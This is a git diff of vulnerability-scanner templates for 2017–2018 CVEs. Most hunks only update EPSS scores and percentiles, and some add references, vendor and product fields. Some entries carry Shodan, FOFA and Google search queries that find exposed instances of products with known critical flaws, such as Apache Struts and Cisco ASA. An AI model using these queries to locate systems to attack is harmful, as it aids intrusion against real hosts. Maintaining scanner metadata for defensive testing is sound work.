a/http/cves/2017/CVE-2017-17731.yaml +++ b/http/cves/2017/CVE-2017-17731.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2017-17731 cwe-id: CWE-89 - epss-score: 0.11468 + epss-score: 0.14043 cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:* + epss-percentile: 0.94965 metadata: fofa-query: app="DedeCMS" max-request: 1 diff --git a/http/cves/2017/CVE-2017-17736.yaml b/http/cves/2017/CVE-2017-17736.yaml index ad5249a47a..2101fa0fed 100644 --- a/http/cves/2017/CVE-2017-17736.yaml +++ b/http/cves/2017/CVE-2017-17736.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-425 epss-score: 0.1483 cpe: cpe:2.3:a:kentico:kentico_cms:*:*:*:*:*:*:*:* + epss-percentile: 0.95082 metadata: max-request: 1 google-query: intitle:"kentico database setup" diff --git a/http/cves/2017/CVE-2017-18024.yaml b/http/cves/2017/CVE-2017-18024.yaml index 35031150f7..23e6ac0806 100644 --- a/http/cves/2017/CVE-2017-18024.yaml +++ b/http/cves/2017/CVE-2017-18024.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00072 cpe: cpe:2.3:a:avantfax:avantfax:3.3.3:*:*:*:*:*:*:* + epss-percentile: 0.29644 metadata: max-request: 1 vendor: avantfax diff --git a/http/cves/2017/CVE-2017-18536.yaml b/http/cves/2017/CVE-2017-18536.yaml index 20ee57ef07..0523195af2 100644 --- a/http/cves/2017/CVE-2017-18536.yaml +++ b/http/cves/2017/CVE-2017-18536.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00088 cpe: cpe:2.3:a:fullworks:stop_user_enumeration:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.36469 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2017/CVE-2017-18598.yaml b/http/cves/2017/CVE-2017-18598.yaml index e910d85074..424651e733 100644 --- a/http/cves/2017/CVE-2017-18598.yaml +++ b/http/cves/2017/CVE-2017-18598.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00094 cpe: cpe:2.3:a:designmodo:qards:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.38904 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2017/CVE-2017-18638.yaml b/http/cves/2017/CVE-2017-18638.yaml index 0da8ed62b0..ef98b24520 100644 --- a/http/cves/2017/CVE-2017-18638.yaml +++ b/http/cves/2017/CVE-2017-18638.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-918 epss-score: 0.00902 cpe: cpe:2.3:a:graphite_project:graphite:*:*:*:*:*:*:*:* + epss-percentile: 0.80714 metadata: max-request: 1 vendor: graphite_project diff --git a/http/cves/2017/CVE-2017-3506.yaml b/http/cves/2017/CVE-2017-3506.yaml index cf7415ab27..0eb4e3b917 100644 --- a/http/cves/2017/CVE-2017-3506.yaml +++ b/http/cves/2017/CVE-2017-3506.yaml @@ -16,6 +16,7 @@ info: cve-id: CVE-2017-3506 epss-score: 0.96927 cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* + epss-percentile: 0.99602 metadata: max-request: 1 vendor: oracle diff --git a/http/cves/2017/CVE-2017-3528.yaml b/http/cves/2017/CVE-2017-3528.yaml index d2a62888f1..f6d90aa5ca 100644 --- a/http/cves/2017/CVE-2017-3528.yaml +++ b/http/cves/2017/CVE-2017-3528.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-601 epss-score: 0.00865 cpe: cpe:2.3:a:oracle:applications_framework:12.1.3:*:*:*:*:*:*:* + epss-percentile: 0.80229 metadata: max-request: 1 vendor: oracle diff --git a/http/cves/2017/CVE-2017-4011.yaml b/http/cves/2017/CVE-2017-4011.yaml index af96fb7c99..9991ecccc0 100644 --- a/http/cves/2017/CVE-2017-4011.yaml +++ b/http/cves/2017/CVE-2017-4011.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00142 cpe: cpe:2.3:a:mcafee:network_data_loss_prevention:*:*:*:*:*:*:*:* + epss-percentile: 0.49337 metadata: max-request: 1 vendor: mcafee diff --git a/http/cves/2017/CVE-2017-5487.yaml b/http/cves/2017/CVE-2017-5487.yaml index a61ad11b07..51d2af5f54 100644 --- a/http/cves/2017/CVE-2017-5487.yaml +++ b/http/cves/2017/CVE-2017-5487.yaml @@ -16,8 +16,9 @@ info: cvss-score: 5.3 cve-id: CVE-2017-5487 cwe-id: CWE-200 - epss-score: 0.97204 + epss-score: 0.97179 cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:* + epss-percentile: 0.99719 metadata: max-request: 2 shodan-query: http.component:"WordPress" diff --git a/http/cves/2017/CVE-2017-5521.yaml b/http/cves/2017/CVE-2017-5521.yaml index e6e5090634..c4ef86a2a9 100644 --- a/http/cves/2017/CVE-2017-5521.yaml +++ b/http/cves/2017/CVE-2017-5521.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-200 epss-score: 0.97402 cpe: cpe:2.3:o:netgear:r6200_firmware:1.0.1.56_1.0.43:*:*:*:*:*:*:* + epss-percentile: 0.99876 metadata: max-request: 1 vendor: netgear diff --git a/http/cves/2017/CVE-2017-5631.yaml b/http/cves/2017/CVE-2017-5631.yaml index 75bc656d40..2b02ed7129 100644 --- a/http/cves/2017/CVE-2017-5631.yaml +++ b/http/cves/2017/CVE-2017-5631.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00286 cpe: cpe:2.3:a:kmc_information_systems:caseaware:-:*:*:*:*:*:*:* + epss-percentile: 0.64713 metadata: max-request: 1 vendor: kmc_information_systems diff --git a/http/cves/2017/CVE-2017-5638.yaml b/http/cves/2017/CVE-2017-5638.yaml index 99477c463d..f63d6b8258 100644 --- a/http/cves/2017/CVE-2017-5638.yaml +++ b/http/cves/2017/CVE-2017-5638.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-20 epss-score: 0.9756 cpe: cpe:2.3:a:apache:struts:2.3.5:*:*:*:*:*:*:* + epss-percentile: 0.99995 metadata: max-request: 1 shodan-query: html:"Apache Struts" diff --git a/http/cves/2017/CVE-2017-5689.yaml b/http/cves/2017/CVE-2017-5689.yaml index bacdfcdaf9..cdd981e82c 100644 --- a/http/cves/2017/CVE-2017-5689.yaml +++ b/http/cves/2017/CVE-2017-5689.yaml @@ -16,8 +16,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-5689 - epss-score: 0.97453 + epss-score: 0.97416 cpe: cpe:2.3:o:intel:active_management_technology_firmware:6.0:*:*:*:*:*:*:* + epss-percentile: 0.99888 metadata: max-request: 2 shodan-query: title:"Active Management Technology" diff --git a/http/cves/2017/CVE-2017-5982.yaml b/http/cves/2017/CVE-2017-5982.yaml index 89a02cb956..15ecad4ae3 100644 --- a/http/cves/2017/CVE-2017-5982.yaml +++ b/http/cves/2017/CVE-2017-5982.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.0488 cpe: cpe:2.3:a:kodi:kodi:17.1:*:*:*:*:*:*:* + epss-percentile: 0.91748 metadata: max-request: 1 vendor: kodi diff --git a/http/cves/2017/CVE-2017-6090.yaml b/http/cves/2017/CVE-2017-6090.yaml index c8ef3c09a9..b0a02af8ad 100644 --- a/http/cves/2017/CVE-2017-6090.yaml +++ b/http/cves/2017/CVE-2017-6090.yaml @@ -14,8 +14,9 @@ info: cvss-score: 8.8 cve-id: CVE-2017-6090 cwe-id: CWE-434 - epss-score: 0.97366 + epss-score: 0.97282 cpe: cpe:2.3:a:phpcollab:phpcollab:*:*:*:*:*:*:*:* + epss-percentile: 0.9978 metadata: max-request: 2 shodan-query: http.title:"PhpCollab" diff --git a/http/cves/2017/CVE-2017-7269.yaml b/http/cves/2017/CVE-2017-7269.yaml index e25d2159ab..b1346c461f 100644 --- a/http/cves/2017/CVE-2017-7269.yaml +++ b/http/cves/2017/CVE-2017-7269.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-119 epss-score: 0.97156 cpe: cpe:2.3:a:microsoft:internet_information_server:6.0:*:*:*:*:*:*:* + epss-percentile: 0.99699 metadata: max-request: 1 vendor: microsoft diff --git a/http/cves/2017/CVE-2017-7391.yaml b/http/cves/2017/CVE-2017-7391.yaml index 2de8d4390d..e2e16e462f 100644 --- a/http/cves/2017/CVE-2017-7391.yaml +++ b/http/cves/2017/CVE-2017-7391.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00204 cpe: cpe:2.3:a:magmi_project:magmi:0.7.22:*:*:*:*:*:*:* + epss-percentile: 0.57588 metadata: max-request: 1 vendor: magmi_project diff --git a/http/cves/2017/CVE-2017-7615.yaml b/http/cves/2017/CVE-2017-7615.yaml index 6961066739..84fee90c08 100644 --- a/http/cves/2017/CVE-2017-7615.yaml +++ b/http/cves/2017/CVE-2017-7615.yaml @@ -21,8 +21,9 @@ info: cvss-score: 8.8 cve-id: CVE-2017-7615 cwe-id: CWE-640 - epss-score: 0.97443 + epss-score: 0.97404 cpe: cpe:2.3:a:mantisbt:mantisbt:*:*:*:*:*:*:*:* + epss-percentile: 0.9988 metadata: max-request: 5 vendor: mantisbt diff --git a/http/cves/2017/CVE-2017-7921.yaml b/http/cves/2017/CVE-2017-7921.yaml index 26ddf1ee87..edd2a1c232 100644 --- a/http/cves/2017/CVE-2017-7921.yaml +++ b/http/cves/2017/CVE-2017-7921.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-287 epss-score: 0.01169 cpe: cpe:2.3:o:hikvision:ds-2cd2032-i_firmware:-:*:*:*:*:*:*:* + epss-percentile: 0.83195 metadata: max-request: 1 vendor: hikvision diff --git a/http/cves/2017/CVE-2017-7925.yaml b/http/cves/2017/CVE-2017-7925.yaml index 6db2015bcd..05cb575b7b 100644 --- a/http/cves/2017/CVE-2017-7925.yaml +++ b/http/cves/2017/CVE-2017-7925.yaml @@ -9,13 +9,15 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2017-7925 - https://ics-cert.us-cert.gov/advisories/ICSA-17-124-02 + - http://us.dahuasecurity.com/en/us/Security-Bulletin_030617.php classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-7925 cwe-id: CWE-522,CWE-260 - epss-score: 0.00583 + epss-score: 0.35031 cpe: cpe:2.3:o:dahuasecurity:dh-ipc-hdbw23a0rn-zs_firmware:-:*:*:*:*:*:*:* + epss-percentile: 0.96568 metadata: max-request: 1 product: dh-ipc-hdbw23a0rn-zs_firmware diff --git a/http/cves/2017/CVE-2017-8229.yaml b/http/cves/2017/CVE-2017-8229.yaml index 89310c05b2..1f0708f67d 100644 --- a/http/cves/2017/CVE-2017-8229.yaml +++ b/http/cves/2017/CVE-2017-8229.yaml @@ -10,16 +10,23 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2017-8229 - http://packetstormsecurity.com/files/153224/Amcrest-IPM-721S-Credential-Disclosure-Privilege-Escalation.html - https://github.com/ethanhunnt/IoT_vulnerabilities/blob/master/Amcrest_sec_issues.pdf + - https://seclists.org/bugtraq/2019/Jun/8 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 + cve-id: CVE-2017-8229 cwe-id: CWE-255 + epss-score: 0.95016 + cpe: cpe:2.3:o:amcrest:ipm-721s_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.99003 metadata: max-request: 1 fofa-query: "Amcrest" shodan-query: html:"Amcrest" verified: true - tags: cve,cve2017,amcrest,iot + vendor: amcrest + product: ipm-721s_firmware + tags: packetstorm,cve,cve2017,amcrest,iot http: - method: GET diff --git a/http/cves/2017/CVE-2017-8917.yaml b/http/cves/2017/CVE-2017-8917.yaml index 9e64a33e8d..79e9d2df63 100644 --- a/http/cves/2017/CVE-2017-8917.yaml +++ b/http/cves/2017/CVE-2017-8917.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-89 epss-score: 0.97555 cpe: cpe:2.3:a:joomla:joomla\!:3.7.0:*:*:*:*:*:*:* + epss-percentile: 0.99994 metadata: max-request: 1 shodan-query: http.component:"Joomla" diff --git a/http/cves/2017/CVE-2017-9140.yaml b/http/cves/2017/CVE-2017-9140.yaml index 0f5a788895..ea43f7b11b 100644 --- a/http/cves/2017/CVE-2017-9140.yaml +++ b/http/cves/2017/CVE-2017-9140.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-79 epss-score: 0.0021 cpe: cpe:2.3:a:progress:telerik_reporting:*:*:*:*:*:*:*:* + epss-percentile: 0.58217 metadata: max-request: 1 vendor: progress diff --git a/http/cves/2017/CVE-2017-9288.yaml b/http/cves/2017/CVE-2017-9288.yaml index ff189cd1b2..fc1c1a1d9a 100644 --- a/http/cves/2017/CVE-2017-9288.yaml +++ b/http/cves/2017/CVE-2017-9288.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00168 cpe: cpe:2.3:a:raygun:raygun4wp:1.8.0:*:*:*:*:wordpress:*:* + epss-percentile: 0.53128 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2017/CVE-2017-9416.yaml b/http/cves/2017/CVE-2017-9416.yaml index f6d12d424b..063a3fdce0 100644 --- a/http/cves/2017/CVE-2017-9416.yaml +++ b/http/cves/2017/CVE-2017-9416.yaml @@ -14,8 +14,9 @@ info: cvss-score: 6.5 cve-id: CVE-2017-9416 cwe-id: CWE-22 - epss-score: 0.01465 + epss-score: 0.01037 cpe: cpe:2.3:a:odoo:odoo:8.0:*:*:*:*:*:*:* + epss-percentile: 0.82064 metadata: max-request: 2 verified: true diff --git a/http/cves/2017/CVE-2017-9506.yaml b/http/cves/2017/CVE-2017-9506.yaml index d803badb4e..02fd1e6677 100644 --- a/http/cves/2017/CVE-2017-9506.yaml +++ b/http/cves/2017/CVE-2017-9506.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-918 epss-score: 0.00575 cpe: cpe:2.3:a:atlassian:oauth:1.3.0:*:*:*:*:*:*:* + epss-percentile: 0.7516 metadata: max-request: 1 shodan-query: http.component:"Atlassian Jira" diff --git a/http/cves/2017/CVE-2017-9791.yaml b/http/cves/2017/CVE-2017-9791.yaml index 9b9ef09ad2..328dd6c969 100644 --- a/http/cves/2017/CVE-2017-9791.yaml +++ b/http/cves/2017/CVE-2017-9791.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.8 cve-id: CVE-2017-9791 cwe-id: CWE-20 - epss-score: 0.97502 + epss-score: 0.97478 cpe: cpe:2.3:a:apache:struts:2.3.1:*:*:*:*:*:*:* + epss-percentile: 0.99948 metadata: max-request: 1 verified: true diff --git a/http/cves/2017/CVE-2017-9805.yaml b/http/cves/2017/CVE-2017-9805.yaml index 4805e90355..5b276b967b 100644 --- a/http/cves/2017/CVE-2017-9805.yaml +++ b/http/cves/2017/CVE-2017-9805.yaml @@ -16,8 +16,9 @@ info: cvss-score: 8.1 cve-id: CVE-2017-9805 cwe-id: CWE-502 - epss-score: 0.97539 + epss-score: 0.97548 cpe: cpe:2.3:a:apache:struts:2.1.2:*:*:*:*:*:*:* + epss-percentile: 0.99992 metadata: max-request: 2 vendor: apache diff --git a/http/cves/2017/CVE-2017-9822.yaml b/http/cves/2017/CVE-2017-9822.yaml index d002188cf8..e150b72a7e 100644 --- a/http/cves/2017/CVE-2017-9822.yaml +++ b/http/cves/2017/CVE-2017-9822.yaml @@ -15,8 +15,9 @@ info: cvss-score: 8.8 cve-id: CVE-2017-9822 cwe-id: CWE-20 - epss-score: 0.97064 + epss-score: 0.97106 cpe: cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:* + epss-percentile: 0.99673 metadata: max-request: 1 vendor: dnnsoftware diff --git a/http/cves/2017/CVE-2017-9833.yaml b/http/cves/2017/CVE-2017-9833.yaml index 4d0755ceba..a0d8679fdf 100644 --- a/http/cves/2017/CVE-2017-9833.yaml +++ b/http/cves/2017/CVE-2017-9833.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.48044 cpe: cpe:2.3:a:boa:boa:0.94.14.21:*:*:*:*:*:*:* + epss-percentile: 0.97006 metadata: max-request: 1 vendor: boa diff --git a/http/cves/2017/CVE-2017-9841.yaml b/http/cves/2017/CVE-2017-9841.yaml index a4e08d936c..96992a6742 100644 --- a/http/cves/2017/CVE-2017-9841.yaml +++ b/http/cves/2017/CVE-2017-9841.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-94 epss-score: 0.97488 cpe: cpe:2.3:a:phpunit_project:phpunit:*:*:*:*:*:*:*:* + epss-percentile: 0.99954 metadata: max-request: 6 vendor: phpunit_project diff --git a/http/cves/2018/CVE-2018-0127.yaml b/http/cves/2018/CVE-2018-0127.yaml index b5e88c3e6a..a9c797b79b 100644 --- a/http/cves/2018/CVE-2018-0127.yaml +++ b/http/cves/2018/CVE-2018-0127.yaml @@ -14,9 +14,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-0127 - cwe-id: CWE-306,CWE-200 - epss-score: 0.08908 + cwe-id: CWE-200,CWE-306 + epss-score: 0.0948 cpe: cpe:2.3:o:cisco:rv132w_firmware:1.0.0.1:*:*:*:*:*:*:* + epss-percentile: 0.93961 metadata: max-request: 1 vendor: "cisco" diff --git a/http/cves/2018/CVE-2018-0296.yaml b/http/cves/2018/CVE-2018-0296.yaml index 58d877cbc5..042c491e3f 100644 --- a/http/cves/2018/CVE-2018-0296.yaml +++ b/http/cves/2018/CVE-2018-0296.yaml @@ -16,9 +16,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 cve-id: CVE-2018-0296 - cwe-id: CWE-20,CWE-22 - epss-score: 0.97461 + cwe-id: CWE-22,CWE-20 + epss-score: 0.97446 cpe: cpe:2.3:a:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:* + epss-percentile: 0.99918 metadata: max-request: 1 vendor: cisco diff --git a/http/cves/2018/CVE-2018-1000129.yaml b/http/cves/2018/CVE-2018-1000129.yaml index 61215e03fd..911308436c 100644 --- a/http/cves/2018/CVE-2018-1000129.yaml +++ b/http/cves/2018/CVE-2018-1000129.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-79 epss-score: 0.00232 cpe: cpe:2.3:a:jolokia:jolokia:1.3.7:*:*:*:*:*:*:* + epss-percentile: 0.60647 metadata: max-request: 2 vendor: jolokia diff --git a/http/cves/2018/CVE-2018-1000130.yaml b/http/cves/2018/CVE-2018-1000130.yaml index 2bf857215d..a0ff2f9fc8 100644 --- a/http/cves/2018/CVE-2018-1000130.yaml +++ b/http/cves/2018/CVE-2018-1000130.yaml @@ -15,8 +15,9 @@ info: cvss-score: 8.1 cve-id: CVE-2018-1000130 cwe-id: CWE-74 - epss-score: 0.90131 + epss-score: 0.89191 cpe: cpe:2.3:a:jolokia:webarchive_agent:1.3.7:*:*:*:*:*:*:* + epss-percentile: 0.98305 metadata: max-request: 1 vendor: jolokia diff --git a/http/cves/2018/CVE-2018-1000226.yaml b/http/cves/2018/CVE-2018-1000226.yaml index bc35701862..5e0e702474 100644 --- a/http/cves/2018/CVE-2018-1000226.yaml +++ b/http/cves/2018/CVE-2018-1000226.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-732 epss-score: 0.01552 cpe: cpe:2.3:a:cobblerd:cobbler:*:*:*:*:*:*:*:* + epss-percentile: 0.85554 metadata: max-request: 1 vendor: cobblerd diff --git a/http/cves/2018/CVE-2018-1000533.yaml b/http/cves/2018/CVE-2018-1000533.yaml index 0999bfcb78..f5c2c4ad7c 100644 --- a/http/cves/2018/CVE-2018-1000533.yaml +++ b/http/cves/2018/CVE-2018-1000533.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-20 epss-score: 0.97207 cpe: cpe:2.3:a:gitlist:gitlist:*:*:*:*:*:*:*:* + epss-percentile: 0.99732 metadata: max-request: 2 vendor: gitlist diff --git a/http/cves/2018/CVE-2018-1000600.yaml b/http/cves/2018/CVE-2018-1000600.yaml index 728b0894ef..de3d9880c8 100644 --- a/http/cves/2018/CVE-2018-1000600.yaml +++ b/http/cves/2018/CVE-2018-1000600.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-200 epss-score: 0.95579 cpe: cpe:2.3:a:jenkins:github:*:*:*:*:*:jenkins:*:* + epss-percentile: 0.99139 metadata: max-request: 1 framework: jenkins diff --git a/http/cves/2018/CVE-2018-1000671.yaml b/http/cves/2018/CVE-2018-1000671.yaml index d87dad94c5..7d221aea66 100644 --- a/http/cves/2018/CVE-2018-1000671.yaml +++ b/http/cves/2018/CVE-2018-1000671.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-601 epss-score: 0.00831 cpe: cpe:2.3:a:sympa:sympa:*:*:*:*:*:*:*:* + epss-percentile: 0.79859 metadata: max-request: 1 shodan-query: http.html:"sympa" diff --git a/http/cves/2018/CVE-2018-1000856.yaml b/http/cves/2018/CVE-2018-1000856.yaml index bd398df9a8..736acb1182 100644 --- a/http/cves/2018/CVE-2018-1000856.yaml +++ b/http/cves/2018/CVE-2018-1000856.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00101 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* + epss-percentile: 0.40768 metadata: max-request: 3 verified: true diff --git a/http/cves/2018/CVE-2018-1000861.yaml b/http/cves/2018/CVE-2018-1000861.yaml index a6151d39bc..878b09b65d 100644 --- a/http/cves/2018/CVE-2018-1000861.yaml +++ b/http/cves/2018/CVE-2018-1000861.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-502 epss-score: 0.97412 cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* + epss-percentile: 0.99884 metadata: max-request: 1 vendor: jenkins diff --git a/http/cves/2018/CVE-2018-10093.yaml b/http/cves/2018/CVE-2018-10093.yaml index bab9584516..c24aac42b2 100644 --- a/http/cves/2018/CVE-2018-10093.yaml +++ b/http/cves/2018/CVE-2018-10093.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-862 epss-score: 0.06287 cpe: cpe:2.3:o:audiocodes:420hd_ip_phone_firmware:2.2.12.126:*:*:*:*:*:*:* + epss-percentile: 0.92688 metadata: max-request: 1 vendor: audiocodes diff --git a/http/cves/2018/CVE-2018-10095.yaml b/http/cves/2018/CVE-2018-10095.yaml index dcbcdc6307..f8151245f8 100644 --- a/http/cves/2018/CVE-2018-10095.yaml +++ b/http/cves/2018/CVE-2018-10095.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-79 epss-score: 0.95296 cpe: cpe:2.3:a:dolibarr:dolibarr:*:*:*:*:*:*:*:* + epss-percentile: 0.99069 metadata: max-request: 1 vendor: dolibarr diff --git a/http/cves/2018/CVE-2018-10141.yaml b/http/cves/2018/CVE-2018-10141.yaml index c7b4fd2fad..a3ad528525 100644 --- a/http/cves/2018/CVE-2018-10141.yaml +++ b/http/cves/2018/CVE-2018-10141.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-79 epss-score: 0.00126 cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* + epss-percentile: 0.46484 metadata: max-request: 1 vendor: paloaltonetworks diff --git a/http/cves/2018/CVE-2018-10201.yaml b/http/cves/2018/CVE-2018-10201.yaml index 4a6658a245..02b2f9a6b9 100644 --- a/http/cves/2018/CVE-2018-10201.yaml +++ b/http/cves/2018/CVE-2018-10201.yaml @@ -16,8 +16,9 @@ info: cvss-score: 7.5 cve-id: CVE-2018-10201 cwe-id: CWE-22 - epss-score: 0.07642 + epss-score: 0.063 cpe: cpe:2.3:a:ncomputing:vspace_pro:10:*:*:*:*:*:*:* + epss-percentile: 0.92695 metadata: max-request: 4 vendor: ncomputing diff --git a/http/cves/2018/CVE-2018-10230.yaml b/http/cves/2018/CVE-2018-10230.yaml index e2ad284c7d..026875d4a6 100644 --- a/http/cves/2018/CVE-2018-10230.yaml +++ b/http/cves/2018/CVE-2018-10230.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00122 cpe: cpe:2.3:a:zend:zend_server:*:*:*:*:*:*:*:* + epss-percentile: 0.45743 metadata: max-request: 1 vendor: zend diff --git a/http/cves/2018/CVE-2018-10562.yaml b/http/cves/2018/CVE-2018-10562.yaml index 8c4b6802f1..b30d69e1e3 100644 --- a/http/cves/2018/CVE-2018-10562.yaml +++ b/http/cves/2018/CVE-2018-10562.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2018-10562 cwe-id: CWE-78 - epss-score: 0.97572 + epss-score: 0.97576 cpe: cpe:2.3:o:dasannetworks:gpon_router_firmware:-:*:*:*:*:*:*:* + epss-percentile: 0.99999 metadata: max-request: 2 vendor: dasannetworks diff --git a/http/cves/2018/CVE-2018-10822.yaml b/http/cves/2018/CVE-2018-10822.yaml index 4027b5e6d1..67ec795841 100644 --- a/http/cves/2018/CVE-2018-10822.yaml +++ b/http/cves/2018/CVE-2018-10822.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.17386 cpe: cpe:2.3:o:dlink:dwr-116_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.95419 metadata: max-request: 1 vendor: dlink diff --git a/http/cves/2018/CVE-2018-10823.yaml b/http/cves/2018/CVE-2018-10823.yaml index a617e33af6..cf60450f35 100644 --- a/http/cves/2018/CVE-2018-10823.yaml +++ b/http/cves/2018/CVE-2018-10823.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-78 epss-score: 0.96863 cpe: cpe:2.3:o:dlink:dwr-116_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.99564 metadata: max-request: 1 vendor: dlink diff --git a/http/cves/2018/CVE-2018-10956.yaml b/http/cves/2018/CVE-2018-10956.yaml index 9edb1bcbbd..297afc058a 100644 --- a/http/cves/2018/CVE-2018-10956.yaml +++ b/http/cves/2018/CVE-2018-10956.yaml @@ -16,8 +16,9 @@ info: cvss-score: 7.5 cve-id: CVE-2018-10956 cwe-id: CWE-22 - epss-score: 0.68675 + epss-score: 0.65072 cpe: cpe:2.3:a:ipconfigure:orchid_core_vms:2.0.5:*:*:*:*:*:*:* + epss-percentile: 0.97442 metadata: max-request: 1 shodan-query: http.title:"Orchid Core VMS" diff --git a/http/cves/2018/CVE-2018-11227.yaml b/http/cves/2018/CVE-2018-11227.yaml index c8c93e743f..7916f6ab2a 100644 --- a/http/cves/2018/CVE-2018-11227.yaml +++ b/http/cves/2018/CVE-2018-11227.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.02667 cpe: cpe:2.3:a:monstra:monstra_cms:*:*:*:*:*:*:*:* + epss-percentile: 0.89064 metadata: max-request: 1 shodan-query: http.favicon.hash:419828698 diff --git a/http/cves/2018/CVE-2018-11231.yaml b/http/cves/2018/CVE-2018-11231.yaml index 41eb8a6e76..a44352b3bc 100644 --- a/http/cves/2018/CVE-2018-11231.yaml +++ b/http/cves/2018/CVE-2018-11231.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-89 epss-score: 0.00903 cpe: cpe:2.3:a:divido:divido:-:*:*:*:*:opencart:*:* + epss-percentile: 0.80727 metadata: max-request: 1 framework: opencart diff --git a/http/cves/2018/CVE-2018-11409.yaml b/http/cves/2018/CVE-2018-11409.yaml index 23a12a6565..813b9715e1 100644 --- a/http/cves/2018/CVE-2018-11409.yaml +++ b/http/cves/2018/CVE-2018-11409.yaml @@ -16,8 +16,9 @@ info: cvss-score: 5.3 cve-id: CVE-2018-11409 cwe-id: CWE-200 - epss-score: 0.95561 + epss-score: 0.95758 cpe: cpe:2.3:a:splunk:splunk:*:*:*:*:*:*:*:* + epss-percentile: 0.99181 metadata: max-request: 2 vendor: splunk diff --git a/http/cves/2018/CVE-2018-11473.yaml b/http/cves/2018/CVE-2018-11473.yaml index 3e263f23e5..909e83933c 100644 --- a/http/cves/2018/CVE-2018-11473.yaml +++ b/http/cves/2018/CVE-2018-11473.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00097 cpe: cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:* + epss-percentile: 0.39898 metadata: max-request: 2 shodan-query: http.favicon.hash:419828698 diff --git a/http/cves/2018/CVE-2018-11709.yaml b/http/cves/2018/CVE-2018-11709.yaml index 0706563a6d..5fe2b73bc0 100644 --- a/http/cves/2018/CVE-2018-11709.yaml +++ b/http/cves/2018/CVE-2018-11709.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00151 cpe: cpe:2.3:a:gvectors:wpforo_forum:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.50613 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2018/CVE-2018-11759.yaml b/http/cves/2018/CVE-2018-11759.yaml index f707d7dbda..7d08ad065d 100644 --- a/http/cves/2018/CVE-2018-11759.yaml +++ b/http/cves/2018/CVE-2018-11759.yaml @@ -17,8 +17,9 @@ info: cvss-score: 7.5 cve-id: CVE-2018-11759 cwe-id: CWE-22 - epss-score: 0.97485 + epss-score: 0.97443 cpe: 